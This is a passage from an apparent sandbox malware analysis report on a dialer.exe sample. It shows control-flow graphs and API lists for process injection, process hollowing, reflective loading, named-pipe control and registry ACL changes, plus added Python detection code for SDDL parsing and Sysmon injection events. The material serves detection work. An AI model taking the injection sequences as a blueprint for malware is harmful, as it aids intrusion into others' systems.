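    if not m:
        raise ValueError("no DACL with ACEs in SDDL string")
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group(1)):
        parts = body.split(";")  # type;flags;rights;object_guid;inherit_object_guid;sid
        if len(parts) != 6:
            raise ValueError(f"malformed ACE: ({body})")
        ace_type, flags, rights, _obj_guid, _inherit_guid, sid = parts
        rights_list = [rights] if rights.lower().startswith("0x") else _pairs(rights)
        aces.append(Ace(ace_type, _pairs(flags), rights_list, sid))
    return aces


def grants_write(rights: List[str]) -> bool:
    """True if the rights field (abbreviations or hex mask) allows modifying the object."""
    for r in rights:
        if r.lower().startswith("0x"):
            if int(r, 16) & WRITE_MASK:
                return True
        elif r in WRITE_RIGHTS:
            return True
    return False


def weak_aces(aces: List[Ace]) -> List[Ace]:
    """Allow ACEs that give write-class rights to a broad trustee."""
    return [a for a in aces if a.ace_type == "A" and a.trustee in BROAD_TRUSTEES and grants_write(a.rights)]


def describe(ace: Ace) -> str:
    kind = {"A": "allow", "D": "deny"}.get(ace.ace_type, ace.ace_type)
    flags = ",".join(ACE_FLAGS.get(f, f) for f in ace.flags) or "-"
    rights = "|".join(RIGHTS.get(r, r) for r in ace.rights)
    return f"{kind:5} {flags:32} {rights:20} -> {TRUSTEES.get(ace.trustee, ace.trustee)}"


# The descriptor copied from the sample's string table in the report above.
DIALER_SDDL = "D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)"

if __name__ == "__main__":
    aces = parse_dacl(DIALER_SDDL)
    for a in aces:
        print(describe(a))
    for a in weak_aces(aces):
        print("WEAK: broad trustee", a.trustee, "can modify the object")
```

The same parser works on the DACL of any key, pipe or file whose SDDL you pull with Get-Acl or icacls; a hit from weak_aces on a key under HKLM\SOFTWARE is a good reason to look at what process created it.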

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 
81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                        • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                        • API String ID: 2561231171-3753927220
                                                        • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                        • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                        • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                        • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
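The control-flow graph above is the injector. It opens a candidate with OpenProcess, resolves the image name with K32GetModuleFileNameExW and PathFindFileNameW and compares it with StrCmpIW (the function's string table holds MSBuild.exe and dialer.exe), inspects the token with OpenProcessToken, GetTokenInformation and GetSidSubAuthority, and then does VirtualAllocEx, WriteProcessMemory and a remote thread whose result it collects with WaitForSingleObject and GetExitCodeThread; the ReflectiveDllMain string points at a reflective loader in the written buffer. Seen from the host, that is a burst of process handles with query/read rights from dialer.exe, then one handle with VM_OPERATION, VM_WRITE and CREATE_THREAD, then a thread whose start address is not backed by a loaded module. The Python below is an added example, not part of the report: detection logic run over constructed Sysmon-style ProcessAccess (event 10) and CreateRemoteThread (event 8) records. The access-mask constants are from winnt.h; the event dicts, the image paths, the threshold of five probed processes and the rule names are assumptions for the example, and the Sysmon field names are used as they appear in Sysmon's own schema.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

# Process access rights (winnt.h); Sysmon reports the requested mask in GrantedAccess.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# VirtualAllocEx needs VM_OPERATION, WriteProcessMemory needs VM_WRITE (and VM_OPERATION),
# a remote thread needs CREATE_THREAD: the three together are the injection handle.
INJECT_MASK = PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD
# What a process-list walk (module name, token lookups) asks for on each candidate.
PROBE_MASK = PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_READ

LOLBIN_SOURCES = {"dialer.exe"}                  # signed Windows binary with no reason to touch other processes
SUSPECT_TARGETS = {"msbuild.exe", "dialer.exe"}  # names from the sample's string table
PROBE_THRESHOLD = 5                              # distinct processes opened with PROBE_MASK (assumed threshold)

Hit = Tuple[str, str]


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def flag_event(ev: Dict) -> List[Hit]:
    """Per-event rules for one Sysmon-style record (EventID 10 ProcessAccess, 8 CreateRemoteThread)."""
    hits: List[Hit] = []
    src = image_name(ev.get("SourceImage", ""))
    tgt = image_name(ev.get("TargetImage", ""))
    if ev["EventID"] == 10:
        mask = int(ev["GrantedAccess"], 16)
        if mask & INJECT_MASK == INJECT_MASK and (src in LOLBIN_SOURCES or tgt in SUSPECT_TARGETS):
            hits.append(("inject-handle", f"{src} opened {tgt} with {mask:#x}"))
    elif ev["EventID"] == 8:
        # A reflective loader runs from memory that VirtualAllocEx created, so the thread start
        # address maps to no module and Sysmon leaves StartModule empty.
        unbacked = ev.get("StartModule", "") == ""
        if unbacked or src in LOLBIN_SOURCES:
            why = "start address not backed by a module" if unbacked else "LOLBin source"
            hits.append(("remote-thread", f"{src} -> {tgt} at {ev.get('StartAddress', '?')} ({why})"))
    return hits


def scan(events: List[Dict]) -> List[Hit]:
    """Run the per-event rules, then the batch rule for a process-list walk by a LOLBin."""
    hits: List[Hit] = []
    probed: Dict[str, set] = defaultdict(set)  # source image -> distinct targets opened with probe rights
    for ev in events:
        hits.extend(flag_event(ev))
        if ev["EventID"] == 10:
            mask = int(ev["GrantedAccess"], 16)
            if mask & PROBE_MASK and not mask & INJECT_MASK:
                probed[image_name(ev["SourceImage"])].add(image_name(ev["TargetImage"]))
    for src, targets in probed.items():
        if src in LOLBIN_SOURCES and len(targets) >= PROBE_THRESHOLD:
            hits.append(("process-walk", f"{src} probed {len(targets)} distinct processes"))
    return hits


# Constructed events for the example (not taken from the report): a walk over six processes,
# the injection handle to MSBuild.exe, the unbacked remote thread, and two benign records.
SYS32 = "C:\\Windows\\System32\\"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 10, "SourceImage": SYS32 + "dialer.exe", "TargetImage": SYS32 + t, "GrantedAccess": "0x1410"}
    for t in ("svchost.exe", "spoolsv.exe", "conhost.exe", "sihost.exe", "taskhostw.exe", "RuntimeBroker.exe")
] + [
    {"EventID": 10, "SourceImage": SYS32 + "dialer.exe", "TargetImage": MSBUILD, "GrantedAccess": "0x43A"},
    {"EventID": 8, "SourceImage": SYS32 + "dialer.exe", "TargetImage": MSBUILD,
     "StartAddress": "0x000001F2A3B40000", "StartModule": "", "StartFunction": ""},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Vendor\edr.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1410"},
    {"EventID": 8, "SourceImage": SYS32 + "csrss.exe", "TargetImage": r"C:\Windows\explorer.exe",
     "StartAddress": "0x00007FFB1C2E3D40", "StartModule": SYS32 + "ntdll.dll",
     "StartFunction": "RtlUserThreadStart"},
]

if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

The inject-handle rule keys on the mask rather than on a single API because the graph shows the injector resolving its thread-creation call through GetModuleHandleA/GetProcAddress (subcall 14000211c), so the exact export is not a stable indicator; the handle rights it must hold are.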

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                        • String ID:
                                                        • API String ID: 4084875642-0
                                                        • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                        • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                        • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                        • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                        • String ID:
                                                        • API String ID: 3197395349-0
                                                        • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                        • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                        • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                        • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

                                                        Control-flow Graph

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                        • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                          • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                          • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                          • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                          • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                          • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                        • OpenProcess.KERNEL32 ref: 0000000140001859
                                                        • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                        • CloseHandle.KERNEL32 ref: 0000000140001875
                                                        • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                        • String ID:
                                                        • API String ID: 1323846700-0
                                                        • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                        • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                        • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                        • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                        • String ID: .text$C:\Windows\System32\
                                                        • API String ID: 2721474350-832442975
                                                        • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                        • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                        • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                        • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                        • String ID: M$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2203880229-3489460547
                                                        • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                        • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                        • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                        • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

                                                         Control-flow Graph
                                                         (graph rendering omitted; the function at 1400021d0-140002255 loops over call 140001b54, Sleep, ConnectNamedPipe, ReadFile and DisconnectNamedPipe)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                        • String ID: \\.\pipe\dialercontrol_redirect64
                                                        • API String ID: 2071455217-3440882674
                                                        • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                        • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                        • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                        • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

                                                         Control-flow Graph
                                                         (graph rendering omitted; the function at 140002b38-140002bf4 calls GetProcessHeap, HeapAlloc, K32EnumProcesses, call 140002540 and Sleep, with the Sleep block looping back to K32EnumProcesses)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                        • String ID:
                                                        • API String ID: 3676546796-0
                                                        • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                        • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                        • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                        • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

                                                         Control-flow Graph
                                                         (graph rendering omitted; the function at 1400018ac-140001912 calls OpenProcess, IsWow64Process and CloseHandle)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseHandleOpenWow64
                                                        • String ID:
                                                        • API String ID: 10462204-0
                                                        • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                        • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                        • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                        • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700

                                                         Control-flow Graph
                                                         (graph rendering omitted; the function at 140002258-140002263 calls 14000226c and then ExitProcess)
                                                        APIs
                                                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                          • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                          • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                          • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                          • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                          • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                          • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                          • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                          • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                          • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                          • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                          • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                          • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                          • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                          • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                        • ExitProcess.KERNEL32 ref: 0000000140002263
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                        • String ID:
                                                        • API String ID: 3836936051-0
                                                        • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                        • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                        • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                        • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                         Control-flow Graph
                                                         (graph rendering omitted; the function at 140002560-140002a8e calls GetProcessHeap, HeapAlloc, HeapFree, K32EnumProcesses, ReadFile, RegOpenKeyExW, RegDeleteValueW, ShellExecuteW, lstrlenW and ExitProcess, plus the subroutines 140001000, 1400010c0, 1400014d8, 1400016cc, 14000175c, 1400017ec, 1400018ac, 140001944, 1400019c4, 140001c88, 14000217c, 1400021a8 and 140002a90)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                        • String ID: SOFTWARE$dialerstager$open
                                                        • API String ID: 3276259517-3931493855
                                                        • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                        • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                        • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                        • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

                                                         Control-flow Graph
                                                         (graph rendering omitted; in the function at 140001c88-140001ebf the main path runs CreateProcessW, VirtualAllocEx, WriteProcessMemory, a WriteProcessMemory loop, VirtualAlloc, GetThreadContext, WriteProcessMemory, SetThreadContext and ResumeThread, while the failure edges lead to OpenProcess and TerminateProcess)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                        • String ID: @
                                                        • API String ID: 3462610200-2766056989
                                                        • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
